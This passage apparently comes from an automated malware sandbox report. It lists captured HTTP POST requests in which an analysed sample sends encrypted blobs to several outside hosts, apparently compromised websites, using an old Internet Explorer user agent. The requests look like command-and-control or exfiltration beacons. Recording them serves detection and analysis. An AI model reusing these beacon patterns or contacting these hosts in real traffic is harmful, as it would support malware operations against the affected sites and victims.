SyPp6ac1f9edFbVsVjaUGnCaGv8d346sy8NfvujaDlhfWsMtw5Rgl0rMC0El9rTicMFClvsaxpP7ReWcJ4Xuqso44icPMU79H+8I3GrYW8F7bIraiahdeQ+Y6HYmZAUdf03i9iL460C4WHuah57e55/2dJRiOm+/knrMX13nrbzJ356XGGPlR3P+t9ZHl0CPbyNiCNUrf/ZN0t+cLib+D21xuNu10JbiLAXCfmDDa4+SEo6OGwSAE54l+V1TLD84j53O7OAK38EAzLQdlE38SyxK5Z379clPLa5IwT8NOeROVRI/9ghk7tTE8p4lBpUu1pEJ+QlVkZf9KbFbXSp+dVXgJBUSfa6HMNsGD9NZeqGWE6jaKXICDzY7j2XxM2W6LkqYqGBudM7B+UNiLnVz2WpkxMGFNvL0DosfXptZpOP/XDbzPo7LbcPfLNo1zosORAl+bEOHKHcmjiAIEYNOTPdabGPjXZBUitBknYV8bkMVseYaVg0v4YpG1edFN0QK4bxU8uYiUPaRGO/ZT5YtTK7BYOeageAP8PtPm78B65Qih2JLmP4VPrCzgg==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 71 31 56 6d 35 38 67 67 66 39 66 69 49 78 44 6a 43 30 31 37 43 44 75 76 78 46 31 51 73 78 70 48 66 50 67 58 39 78 37 68 49 4e 30 52 55 6f 4e 56 36 36 31 31 51 64 55 32 7a 74 6d 65 34 63 2f 45 76 56 79 6e 43 48 4d 51 55 66 4e 31 2b 47 47 41 33 6b 42 66 4f 39 45 34 62 77 57 49 73 33 55 59 73 33 50 4b 33 71 49 50 2b 74 31 37 46 5a 30 67 37 6a 4d 48 6c 43 51 46 35 73 37 52 6e 46 37 34 43 6c 51 6a 79 4c 71 57 48 4e 4b 77 4f 43 54 6d 71 44 38 67 79 36 30 53 4f 46 4b 4e 79 37 4d 6c 5a 4c 72 44 50 4d 65 2b 34 38 64 76 32 35 49 32 2b 76 74 75 69 66 37 2b 68 36 33 4c 59 46 59 77 6c 64 76 51 53 68 6a 2f 31 6e 4e 66 6a 2b 59 72 56 56 66 4a 62 66 51 54 54 6f 79 35 5a 4a 39 4b 7a 68 53 51 54 46 71 50 74 39 66 54 73 43 33 31 64 6d 6b 6b 71 34 65 73 31 58 72 73 2f 61 63 6c 38 34 61 71 78 73 62 6c 6c 67 79 47 70 79 66 66 71 71 76 36 6a 41 70 78 38 42 56 6d 74 38 34 57 79 51 56 74 39 30 6f 30 68 71 42 36 69 4e 32 42 45 72 56 50 6a 46 2f 6c 70 2b 5a 75 34 78 6f 65 6e 74 64 77 74 4c 74 50 75 5a 64 5a 2f 58 6e 7a 4d 71 6f 62 76 43 47 41 32 5a 6e 65 4c 75 48 45 37 65 30 43 34 2f 73 44 46 55 68 42 6a 4c 62 47 50 6d 56 58 45 73 45 54 51 68 4b 2b 36 49 44 51 49 4a 4c 36 6a 70 51 44 4f 46 52 53 54 44 47 68 62 6d 65 69 4e 38 34 53 55 44 6b 49 4e 72 43 55 5a 61 2f 41 45 6c 65 64 74 48 6d 51 4a 31 6b 71 43 72 48 52 43 78 2b 36 41 4f 65 63 4b 33 6e 79 61 52 39 31 55 54 4b 54 75 55 67 67 38 6d 67 72 2f 73 41 69 6e 42 76 2b 6e 54 68 2f 6d 54 6b 37 78 42 2f 31 75 75 5a 59 56 32 45 79 48 34 54 42 35 71 4d 6e 46 68 70 51 4a 73 61 49 43 45 45 71 70 51 51 4c 49 61 55 65 51 76 6f 67 77 66 53 59 37 61 42 71 59 34 48 56 73 56 36 4f 59 43 4d 4d 77 56 6a 6b 47 53 33 30 62 37 63 46 38 75 4f 58 71 52 32 2b 4e 7a 47 34 59 44 6c 43 49 6c 74 6f 77 47 36 67 44 6c 41 64 65 58 73 3d Data Ascii: q1Vm58ggf9fiIxDjC017CDuvxF1QsxpHfPgX9x7hIN0RUoNV6611QdU2ztme4c/EvVynCHMQUfN1+GGA3kBfO9E4bwWIs3UYs3PK3qIP+t17FZ0g7jMHlCQF5s7RnF74ClQjyLqWHNKwOCTmqD8gy60SOFKNy7MlZLrDPMe+48dv25I2+vtuif7+h63LYFYwldvQShj/1nNfj+YrVVfJbfQTToy5ZJ9KzhSQTFqPt9fTsC31dmkkq4es1Xrs/acl84aqxsbllgyGpyffqqv6jApx8BVmt84WyQVt90o0hqB6iN2BErVPjF/lp+Zu4xoentdwtLtPuZdZ/XnzMqobvCGA2ZneLuHE7e0C4/sDFUhBjLbGPmVXEsETQhK+6IDQIJL6jpQDOFRSTDGhbmeiN84SUDkINrCUZa/AEledtHmQJ1kqCrHRCx+6AOecK3nyaR91UTKTuUgg8mgr/sAinBv+nTh/mTk7xB/1uuZYV2EyH4TB5qMnFhpQJsaICEEqpQQLIaUeQvogwfSY7aBqY4HVsV6OYCMMwVjkGS30b7cF8uOXqR2+NzG4YDlCIltowG6gDlAdeXs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 6e 39 50 78 76 61 67 6e 62 64 63 61 32 71 72 71 61 2b 59 75 69 68 75 31 58 33 32 77 38 38 6d 65 58 4d 58 39 31 4b 4a 49 69 46 75 44 46 67 39 35 4d 36 74 31 47 75 74 36 71 6e 70 4d 42 53 73 70 57 75 72 6a 75 68 48 5a 54 6b 55 4a 4f 37 57 53 42 4f 34 6d 31 74 4b 67 64 31 58 78 75 4a 63 31 37 4f 6a 62 41 79 38 7a 4d 36 4a 35 39 38 78 77 43 6a 56 78 48 6e 2b 30 46 62 6b 6f 64 44 52 4f 4c 75 77 51 43 35 66 58 63 4f 37 53 33 79 44 48 66 35 50 78 6e 4b 2b 37 36 54 6b 44 75 75 61 50 44 4e 55 34 34 67 64 67 78 44 59 69 39 78 46 74 41 72 61 75 49 4f 6a 6f 34 58 64 4f 49 61 64 39 57 68 33 6c 6e 41 4e 70 73 69 47 61 62 2b 6c 69 4e 2b 79 69 68 6e 64 76 41 6f 7a 65 66 42 37 71 50 56 55 43 69 36 34 6b 54 4a 75 5a 37 74 2f 34 45 32 61 66 77 39 43 4c 41 58 39 61 64 39 6f 31 35 38 44 48 73 6f 30 4e 41 55 41 69 55 78 6b 65 6d 64 65 37 69 61 6d 66 37 72 2f 36 55 64 48 39 70 4e 57 6b 67 42 50 39 51 48 47 73 4c 71 44 75 47 69 48 39 74 78 4e 65 32 66 70 79 33 57 47 57 4d 63 78 2f 75 6f 4e 66 4e 61 51 6c 62 70 31 66 74 4b 6f 31 46 59 55 32 68 44 44 56 56 38 6b 7a 4a 62 49 57 6c 6e 54 65 76 76 32 57 6f 42 53 73 59 43 5a 4b 66 53 2f 2b 52 4c 57 37 38 4a 6f 4d 69 39 43 6b 5a 34 4c 5a 6f 78 53 78 73 79 35 52 72 69 2b 6a 6d 74 46 31 44 52 74 59 35 63 2f 63 65 72 32 65 5a 47 6c 51 4f 6e 47 4a 39 43 53 59 52 79 41 43 4d 47 52 68 53 6b 44 4c 4f 2f 41 76 7a 69 32 72 56 4b 59 72 73 35 44 4d 41 63 77 35 54 77 78 58 7a 56 54 7a 37 48 37 42 2b 5a 30 2b 52 41 58 41 52 30 42 52 66 4f 48 6d 67 70 41 78 6f 43 53 59 70 4c 6f 6b 4b 67 79 38 4a 49 57 38 59 33 71 62 48 44 78 61 49 6e 2f 66 39 4f 52 61 74 50 34 35 6f 75 77 75 4c 36 6f 77 6c 32 44 52 35 64 30 37 4f 56 54 4f 68 41 3d 3d Data Ascii: n9Pxvagnbdca2qrqa+Yuihu1X32w88meXMX91KJIiFuDFg95M6t1Gut6qnpMBSspWurjuhHZTkUJO7WSBO4m1tKgd1XxuJc17OjbAy8zM6J598xwCjVxHn+0FbkodDROLuwQC5fXcO7S3yDHf5PxnK+76TkDuuaPDNU44gdgxDYi9xFtArauIOjo4XdOIad9Wh3lnANpsiGab+liN+yihndvAozefB7qPVUCi64kTJuZ7t/4E2afw9CLAX9ad9o158DHso0NAUAiUxkemde7iamf7r/6UdH9pNWkgBP9QHGsLqDuGiH9txNe2fpy3WGWMcx/uoNfNaQlbp1ftKo1FYU2hDDVV8kzJbIWlnTevv2WoBSsYCZKfS/+RLW78JoMi9CkZ4LZoxSxsy5Rri+jmtF1DRtY5c/cer2eZGlQOnGJ9CSYRyACMGRhSkDLO/Avzi2rVKYrs5DMAcw5TwxXzVTz7H7B+Z0+RAXAR0BRfOHmgpAxoCSYpLokKgy8JIW8Y3qbHDxaIn/f9ORatP45ouwuL6owl2DR5d07OVTOhA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 71 31 56 6d 35 38 67 67 66 39 66 69 49 78 44 6a 43 30 31 37 43 44 75 76 78 46 31 51 73 78 70 48 66 50 67 58 39 78 37 68 49 4e 30 52 55 6f 4e 56 36 36 31 31 51 64 55 32 7a 74 6d 65 34 63 2f 45 76 56 79 6e 43 48 4d 51 55 66 4e 31 2b 47 47 41 33 6b 42 66 4f 39 45 34 62 77 57 49 73 33 55 59 73 33 50 4b 33 71 49 50 2b 74 31 37 46 5a 30 67 37 6a 4d 48 6c 43 51 46 35 73 37 52 6e 46 37 34 43 6c 51 6a 79 4c 71 57 48 4e 4b 77 4f 43 54 6d 71 44 38 67 79 36 30 53 4f 46 4b 4e 79 37 4d 6c 5a 4c 72 44 50 4d 65 2b 34 38 64 76 32 35 49 32 2b 76 74 75 69 66 37 2b 68 36 33 4c 59 46 59 77 6c 64 76 51 53 68 6a 2f 31 6e 4e 66 6a 2b 59 72 56 56 66 4a 62 66 51 54 54 6f 79 35 5a 4a 39 4b 7a 68 53 51 54 46 71 50 74 39 66 54 73 43 33 31 64 6d 6b 6b 71 34 65 73 31 58 72 73 2f 61 63 6c 38 34 61 71 78 73 62 6c 6c 67 79 47 70 79 66 66 71 71 76 36 6a 41 70 78 38 42 56 6d 74 38 34 57 79 51 56 74 39 30 6f 30 68 71 42 36 69 4e 32 42 45 72 56 50 6a 46 2f 6c 70 2b 5a 75 34 78 6f 65 6e 74 64 77 74 4c 74 50 75 5a 64 5a 2f 58 6e 7a 4d 71 6f 62 76 43 47 41 32 5a 6e 65 4c 75 48 45 37 65 30 43 34 2f 73 44 46 55 68 42 6a 4c 62 47 50 6d 56 58 45 73 45 54 51 68 4b 2b 36 49 44 51 49 4a 4c 36 6a 70 51 44 4f 46 52 53 54 44 47 68 62 6d 65 69 4e 38 34 53 55 44 6b 49 4e 72 43 55 5a 61 2f 41 45 6c 65 64 74 48 6d 51 4a 31 6b 71 43 72 48 52 43 78 2b 36 41 4f 65 63 4b 33 6e 79 61 52 39 31 55 54 4b 54 75 55 67 67 38 6d 67 72 2f 73 41 69 6e 42 76 2b 6e 54 68 2f 6d 54 6b 37 78 42 2f 31 75 75 5a 59 56 32 45 79 48 34 54 42 35 71 4d 6e 46 68 70 51 4a 73 61 49 43 45 45 71 70 51 51 4c 49 61 55 65 51 76 6f 67 77 66 53 59 37 61 42 71 59 34 48 56 73 56 36 4f 59 43 4d 4d 77 56 6a 6b 47 53 33 30 62 37 63 46 38 75 4f 58 71 52 32 2b 4e 7a 47 34 59 44 6c 43 49 6c 74 6f 77 47 36 67 44 6c 41 64 65 58 73 3d Data Ascii: q1Vm58ggf9fiIxDjC017CDuvxF1QsxpHfPgX9x7hIN0RUoNV6611QdU2ztme4c/EvVynCHMQUfN1+GGA3kBfO9E4bwWIs3UYs3PK3qIP+t17FZ0g7jMHlCQF5s7RnF74ClQjyLqWHNKwOCTmqD8gy60SOFKNy7MlZLrDPMe+48dv25I2+vtuif7+h63LYFYwldvQShj/1nNfj+YrVVfJbfQTToy5ZJ9KzhSQTFqPt9fTsC31dmkkq4es1Xrs/acl84aqxsbllgyGpyffqqv6jApx8BVmt84WyQVt90o0hqB6iN2BErVPjF/lp+Zu4xoentdwtLtPuZdZ/XnzMqobvCGA2ZneLuHE7e0C4/sDFUhBjLbGPmVXEsETQhK+6IDQIJL6jpQDOFRSTDGhbmeiN84SUDkINrCUZa/AEledtHmQJ1kqCrHRCx+6AOecK3nyaR91UTKTuUgg8mgr/sAinBv+nTh/mTk7xB/1uuZYV2EyH4TB5qMnFhpQJsaICEEqpQQLIaUeQvogwfSY7aBqY4HVsV6OYCMMwVjkGS30b7cF8uOXqR2+NzG4YDlCIltowG6gDlAdeXs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 44 75 48 77 6c 63 37 4c 68 4e 65 73 6c 67 53 37 57 57 42 2f 2f 6a 47 2b 53 46 37 4f 79 63 74 68 34 67 42 31 49 30 57 32 55 5a 50 78 42 76 62 78 66 37 4b 37 56 71 4b 47 46 58 76 65 43 58 49 76 2f 6f 2f 62 75 4b 74 6b 47 35 62 46 4b 54 4c 72 2f 6d 66 65 34 62 57 59 42 32 6c 6f 5a 75 41 47 47 57 62 6f 2f 45 38 30 74 2f 44 79 32 36 46 57 54 61 35 67 2f 39 50 6c 75 61 6c 48 52 77 64 4b 36 6c 4e 64 61 69 78 31 49 6a 76 4a 49 70 65 48 52 68 7a 4f 36 62 7a 61 59 54 30 50 4a 34 43 68 43 78 2f 37 49 74 30 55 49 6a 77 58 36 68 61 36 37 64 54 41 6a 76 45 51 44 54 6f 41 43 54 4b 77 64 47 47 65 77 55 54 53 6d 72 76 58 75 43 54 49 73 35 44 6e 76 32 73 4a 69 71 51 38 6a 55 71 37 74 49 55 68 2f 64 36 75 5a 6a 6c 50 5a 43 72 67 64 77 77 51 58 4e 71 38 71 79 48 2b 62 32 4a 75 4b 69 43 45 35 43 4b 33 55 2b 41 38 72 6c 2b 55 48 32 74 45 4b 58 51 7a 30 77 77 71 32 5a 6b 75 58 34 71 48 72 34 6f 33 4d 43 70 53 30 39 4b 59 6b 53 54 6a 37 73 54 2f 67 46 34 72 6a 64 6c 6c 72 62 7a 4a 55 36 38 50 58 74 4a 4b 72 49 7a 52 4f 45 51 7a 62 4b 4f 31 62 62 47 67 6e 49 76 59 4f 2b 36 75 73 4f 61 42 64 2b 37 65 39 73 56 64 70 58 67 4f 34 4c 58 54 78 37 2b 33 57 53 6c 39 5a 45 36 77 64 4e 37 30 48 37 42 6a 38 53 75 41 56 51 62 36 58 63 7a 65 72 38 44 47 63 32 4a 4b 33 4e 5a 58 59 77 75 34 52 59 35 36 68 72 74 58 39 43 5a 64 7a 6a 77 38 32 4d 72 49 6b 52 61 7a 49 73 66 6a 2b 41 46 50 36 4e 53 58 44 49 5a 30 33 59 61 57 59 6d 52 30 73 6b 64 4a 58 2f 58 75 6d 6f 41 4a 65 63 5a 45 4d 49 4d 73 38 55 39 59 4e 54 4a 48 6b 6a 4c 7a 4f 45 6f 72 43 2f 4c 68 52 35 38 71 61 2b 78 6a 55 6b 57 30 50 68 38 77 68 31 4b 72 6b 33 72 58 39 39 44 54 69 59 74 58 57 67 4a 6e 41 36 56 72 30 78 4e 42 65 75 6b 3d Data Ascii: DuHwlc7LhNeslgS7WWB//jG+SF7Oycth4gB1I0W2UZPxBvbxf7K7VqKGFXveCXIv/o/buKtkG5bFKTLr/mfe4bWYB2loZuAGGWbo/E80t/Dy26FWTa5g/9PlualHRwdK6lNdaix1IjvJIpeHRhzO6bzaYT0PJ4ChCx/7It0UIjwX6ha67dTAjvEQDToACTKwdGGewUTSmrvXuCTIs5Dnv2sJiqQ8jUq7tIUh/d6uZjlPZCrgdwwQXNq8qyH+b2JuKiCE5CK3U+A8rl+UH2tEKXQz0wwq2ZkuX4qHr4o3MCpS09KYkSTj7sT/gF4rjdllrbzJU68PXtJKrIzROEQzbKO1bbGgnIvYO+6usOaBd+7e9sVdpXgO4LXTx7+3WSl9ZE6wdN70H7Bj8SuAVQb6Xczer8DGc2JK3NZXYwu4RY56hrtX9CZdzjw82MrIkRazIsfj+AFP6NSXDIZ03YaWYmR0skdJX/XumoAJecZEMIMs8U9YNTJHkjLzOEorC/LhR58qa+xjUkW0Ph8wh1Krk3rX99DTiYtXWgJnA6Vr0xNBeuk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 39 33 55 39 6b 4b 55 30 42 78 43 54 66 79 75 50 54 46 33 6a 44 78 34 30 46 63 72 7a 5a 42 6f 38 71 61 4f 4d 37 73 6a 4b 58 78 37 49 77 49 37 55 4b 74 74 75 78 35 49 2b 61 4f 72 4c 6c 54 53 78 67 78 2b 68 76 48 47 68 42 71 33 58 52 51 55 5a 45 35 70 6c 6a 6b 56 75 63 57 61 6f 55 57 46 51 6f 33 6e 30 55 52 4a 67 6d 38 6d 65 2f 48 78 46 57 63 51 31 79 51 6f 6d 2f 44 54 47 6c 47 64 66 4b 62 33 42 61 47 48 4d 71 71 4d 79 4a 33 6f 45 6a 68 30 45 7a 78 76 49 46 2b 63 59 30 47 6d 34 32 54 55 32 48 46 58 4e 56 7a 75 36 38 76 43 50 6d 69 6f 77 42 6d 48 63 59 34 41 65 44 61 4a 6e 34 55 6c 5a 43 58 42 70 6d 39 59 73 51 33 38 57 36 75 66 4b 74 68 79 57 47 72 59 71 5a 30 61 61 70 76 7a 37 56 61 71 42 4a 4a 59 4e 48 66 54 4c 4b 4d 43 32 4a 33 48 45 76 44 6e 55 59 47 66 6d 50 35 44 32 67 63 6a 65 77 2b 4f 63 70 67 56 4c 54 68 34 4e 2f 37 34 4c 37 55 44 68 38 58 43 34 2b 52 73 35 70 4a 4d 44 7a 42 69 54 4f 38 67 5a 31 38 76 37 47 32 74 53 6d 6f 2b 51 37 63 30 4c 70 74 64 79 53 47 51 51 75 61 5a 41 6d 7a 55 7a 66 38 74 2b 54 66 78 69 59 41 69 6a 2b 72 4f 74 76 6e 75 46 71 48 57 48 61 51 44 59 52 42 51 41 4b 32 43 69 49 56 58 73 5a 77 4c 2b 78 4b 4b 76 77 67 4a 38 31 6f 50 2b 4d 65 71 6d 48 34 37 62 48 36 6d 2f 7a 39 74 4c 69 38 67 4b 4b 47 72 46 79 31 54 45 71 30 79 41 77 72 58 30 2b 34 78 46 46 7a 36 51 43 63 2b 48 2f 51 33 43 48 4b 47 6d 32 74 69 44 74 50 71 48 45 46 53 39 46 74 6e 41 52 32 6a 65 64 69 5a 43 34 4f 2f 74 67 6e 56 47 42 67 74 79 6c 39 4c 30 63 42 68 6f 4f 6f 76 47 38 4b 34 46 46 59 74 56 73 57 6c 73 50 4d 48 71 6b 50 68 6a 65 61 4f 46 6c 2b 58 6f 61 46 35 47 45 7a 53 32 77 48 35 74 77 46 44 57 2f 79 5a 64 58 62 57 64 32 39 78 63 68 56 47 4d Data Ascii: 93U9kKU0BxCTfyuPTF3jDx40FcrzZBo8qaOM7sjKXx7IwI7UKttux5I+aOrLlTSxgx+hvHGhBq3XRQUZE5pljkVucWaoUWFQo3n0URJgm8me/HxFWcQ1yQom/DTGlGdfKb3BaGHMqqMyJ3oEjh0EzxvIF+cY0Gm42TU2HFXNVzu68vCPmiowBmHcY4AeDaJn4UlZCXBpm9YsQ38W6ufKthyWGrYqZ0aapvz7VaqBJJYNHfTLKMC2J3HEvDnUYGfmP5D2gcjew+OcpgVLTh4N/74L7UDh8XC4+Rs5pJMDzBiTO8gZ18v7G2tSmo+Q7c0LptdySGQQuaZAmzUzf8t+TfxiYAij+rOtvnuFqHWHaQDYRBQAK2CiIVXsZwL+xKKvwgJ81oP+MeqmH47bH6m/z9tLi8gKKGrFy1TEq0yAwrX0+4xFFz6QCc+H/Q3CHKGm2tiDtPqHEFS9FtnAR2jediZC4O/tgnVGBgtyl9L0cBhoOovG8K4FFYtVsWlsPMHqkPhjeaOFl+XoaF5GEzS2wH5twFDW/yZdXbWd29xchVGM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 39 33 55 39 6b 4b 55 30 42 78 43 54 66 79 75 50 54 46 33 6a 44 78 34 30 46 63 72 7a 5a 42 6f 38 71 61 4f 4d 37 73 6a 4b 58 78 37 49 77 49 37 55 4b 74 74 75 78 35 49 2b 61 4f 72 4c 6c 54 53 78 67 78 2b 68 76 48 47 68 42 71 33 58 52 51 55 5a 45 35 70 6c 6a 6b 56 75 63 57 61 6f 55 57 46 51 6f 33 6e 30 55 52 4a 67 6d 38 6d 65 2f 48 78 46 57 63 51 31 79 51 6f 6d 2f 44 54 47 6c 47 64 66 4b 62 33 42 61 47 48 4d 71 71 4d 79 4a 33 6f 45 6a 68 30 45 7a 78 76 49 46 2b 63 59 30 47 6d 34 32 54 55 32 48 46 58 4e 56 7a 75 36 38 76 43 50 6d 69 6f 77 42 6d 48 63 59 34 41 65 44 61 4a 6e 34 55 6c 5a 43 58 42 70 6d 39 59 73 51 33 38 57 36 75 66 4b 74 68 79 57 47 72 59 71 5a 30 61 61 70 76 7a 37 56 61 71 42 4a 4a 59 4e 48 66 54 4c 4b 4d 43 32 4a 33 48 45 76 44 6e 55 59 47 66 6d 50 35 44 32 67 63 6a 65 77 2b 4f 63 70 67 56 4c 54 68 34 4e 2f 37 34 4c 37 55 44 68 38 58 43 34 2b 52 73 35 70 4a 4d 44 7a 42 69 54 4f 38 67 5a 31 38 76 37 47 32 74 53 6d 6f 2b 51 37 63 30 4c 70 74 64 79 53 47 51 51 75 61 5a 41 6d 7a 55 7a 66 38 74 2b 54 66 78 69 59 41 69 6a 2b 72 4f 74 76 6e 75 46 71 48 57 48 61 51 44 59 52 42 51 41 4b 32 43 69 49 56 58 73 5a 77 4c 2b 78 4b 4b 76 77 67 4a 38 31 6f 50 2b 4d 65 71 6d 48 34 37 62 48 36 6d 2f 7a 39 74 4c 69 38 67 4b 4b 47 72 46 79 31 54 45 71 30 79 41 77 72 58 30 2b 34 78 46 46 7a 36 51 43 63 2b 48 2f 51 33 43 48 4b 47 6d 32 74 69 44 74 50 71 48 45 46 53 39 46 74 6e 41 52 32 6a 65 64 69 5a 43 34 4f 2f 74 67 6e 56 47 42 67 74 79 6c 39 4c 30 63 42 68 6f 4f 6f 76 47 38 4b 34 46 46 59 74 56 73 57 6c 73 50 4d 48 71 6b 50 68 6a 65 61 4f 46 6c 2b 58 6f 61 46 35 47 45 7a 53 32 77 48 35 74 77 46 44 57 2f 79 5a 64 58 62 57 64 32 39 78 63 68 56 47 4d Data Ascii: 93U9kKU0BxCTfyuPTF3jDx40FcrzZBo8qaOM7sjKXx7IwI7UKttux5I+aOrLlTSxgx+hvHGhBq3XRQUZE5pljkVucWaoUWFQo3n0URJgm8me/HxFWcQ1yQom/DTGlGdfKb3BaGHMqqMyJ3oEjh0EzxvIF+cY0Gm42TU2HFXNVzu68vCPmiowBmHcY4AeDaJn4UlZCXBpm9YsQ38W6ufKthyWGrYqZ0aapvz7VaqBJJYNHfTLKMC2J3HEvDnUYGfmP5D2gcjew+OcpgVLTh4N/74L7UDh8XC4+Rs5pJMDzBiTO8gZ18v7G2tSmo+Q7c0LptdySGQQuaZAmzUzf8t+TfxiYAij+rOtvnuFqHWHaQDYRBQAK2CiIVXsZwL+xKKvwgJ81oP+MeqmH47bH6m/z9tLi8gKKGrFy1TEq0yAwrX0+4xFFz6QCc+H/Q3CHKGm2tiDtPqHEFS9FtnAR2jediZC4O/tgnVGBgtyl9L0cBhoOovG8K4FFYtVsWlsPMHqkPhjeaOFl+XoaF5GEzS2wH5twFDW/yZdXbWd29xchVGM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 31 66 32 37 46 76 6d 61 6d 64 65 62 34 30 70 45 69 41 68 4d 68 5a 4c 78 34 42 54 58 69 30 4b 32 50 57 32 42 5a 4e 34 2b 38 30 2b 4f 52 68 7a 58 4f 55 5a 67 6d 52 63 55 50 61 6e 52 42 59 67 67 69 6a 61 30 38 76 78 58 41 38 53 6c 4e 4a 61 35 56 53 34 34 2f 2b 33 74 33 59 51 71 61 46 35 4f 55 33 57 4e 6f 56 75 49 6d 31 31 62 39 2f 46 2f 43 7a 76 2f 68 38 65 2f 74 63 36 73 74 49 6d 34 74 4a 47 76 46 41 6b 73 62 56 33 42 50 6a 4b 54 75 32 4d 68 4f 30 2b 59 4c 6b 6d 4e 31 59 63 71 5a 33 53 6d 4f 58 39 30 56 36 37 2f 56 70 67 35 6c 55 52 61 46 77 4a 4a 56 6e 7a 33 64 56 33 56 6f 57 66 39 50 37 58 37 55 4c 4d 62 67 66 30 2f 6d 58 67 72 72 68 43 54 33 30 34 63 2b 45 32 56 4e 48 45 4c 51 54 6c 57 32 79 49 64 74 78 58 56 74 43 54 59 56 34 48 71 30 4b 6b 46 32 7a 37 2f 71 37 46 45 55 35 32 67 2f 36 38 52 66 45 71 44 68 76 47 45 77 74 72 6b 76 39 42 61 39 4d 44 39 34 38 69 53 4a 66 53 63 48 79 57 39 4a 43 63 45 4a 4c 44 32 72 7a 36 79 39 4f 2b 44 6e 67 64 6e 51 49 42 2f 34 4f 35 69 35 5a 36 39 4e 49 4e 4d 2f 2b 70 52 78 63 46 6b 6f 46 68 76 69 61 7a 66 55 47 49 41 33 48 50 36 69 41 44 47 79 50 68 34 39 7a 70 71 31 2f 63 59 44 4d 44 70 46 6f 45 30 36 32 4e 43 6e 6e 7a 62 6f 37 66 49 43 7a 51 30 76 7a 6b 44 56 4f 55 6c 55 71 66 64 36 6d 55 6a 52 33 48 44 55 51 6c 45 49 42 58 52 72 6b 37 39 4c 4f 6a 76 34 79 6c 44 36 79 74 50 52 58 57 57 65 61 79 51 7a 7a 79 58 63 64 72 67 71 74 6f 76 56 57 76 72 47 59 4a 4d 44 7a 44 41 6a 6b 2b 46 45 38 36 52 42 52 63 69 4f 44 43 67 65 2b 50 68 5a 76 4b 75 36 6d 34 7a 52 70 6e 6a 5a 55 6f 37 46 72 44 53 48 52 53 58 56 41 50 73 76 32 48 44 54 63 46 32 5a 71 2b 65 4c 69 77 3d Data Ascii: 1f27Fvmamdeb40pEiAhMhZLx4BTXi0K2PW2BZN4+80+ORhzXOUZgmRcUPanRBYggija08vxXA8SlNJa5VS44/+3t3YQqaF5OU3WNoVuIm11b9/F/Czv/h8e/tc6stIm4tJGvFAksbV3BPjKTu2MhO0+YLkmN1YcqZ3SmOX90V67/Vpg5lURaFwJJVnz3dV3VoWf9P7X7ULMbgf0/mXgrrhCT304c+E2VNHELQTlW2yIdtxXVtCTYV4Hq0KkF2z7/q7FEU52g/68RfEqDhvGEwtrkv9Ba9MD948iSJfScHyW9JCcEJLD2rz6y9O+DngdnQIB/4O5i5Z69NINM/+pRxcFkoFhviazfUGIA3HP6iADGyPh49zpq1/cYDMDpFoE062NCnnzbo7fICzQ0vzkDVOUlUqfd6mUjR3HDUQlEIBXRrk79LOjv4ylD6ytPRXWWeayQzzyXcdrgqtovVWvrGYJMDzDAjk+FE86RBRciODCge+PhZvKu6m4zRpnjZUo7FrDSHRSXVAPsv2HDTcF2Zq+eLiw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1; __goc_session__=mmikjcccpacmhhypnhsmmibzvjxnzchhData Raw: 47 76 4b 41 41 43 6e 69 6d 4e 63 79 38 64 48 77 2b 4d 56 50 4c 30 49 77 66 4c 54 48 57 6b 2f 4c 62 63 38 46 45 30 46 2b 43 68 38 65 50 6c 63 4a 74 6b 6a 48 43 51 6b 77 55 46 73 4f 4f 30 43 33 57 67 34 44 33 46 78 4b 72 6b 63 37 4a 2b 55 6f 72 66 77 5a 5a 4f 32 7a 4d 59 64 4b 78 43 6e 6a 61 6a 47 63 37 53 78 4c 62 62 78 45 43 78 72 38 78 71 53 50 75 4c 48 34 55 35 6f 42 6f 41 46 51 68 4b 52 72 50 66 47 77 34 55 58 78 2f 32 71 55 4b 64 78 32 70 63 6b 52 45 6b 6b 7a 4a 53 57 54 33 32 38 4c 71 74 59 75 46 48 4c 44 61 73 6c 77 78 6d 61 75 73 54 42 71 2b 31 64 68 39 6b 2f 6e 47 48 6b 44 4a 43 38 58 31 76 4d 36 2b 64 63 31 64 48 47 34 59 62 6f 72 5a 53 30 79 6c 37 45 65 6a 33 70 79 34 53 66 30 42 44 44 6c 4d 31 45 2f 6d 4e 67 55 49 45 43 2b 79 63 71 4f 45 2b 4a 6a 64 48 6c 55 50 7a 73 2f 4e 36 57 72 4d 6e 33 6d 66 67 64 48 54 36 66 79 4a 59 5a 2f 4e 78 78 78 54 6f 57 6c 78 6b 56 41 62 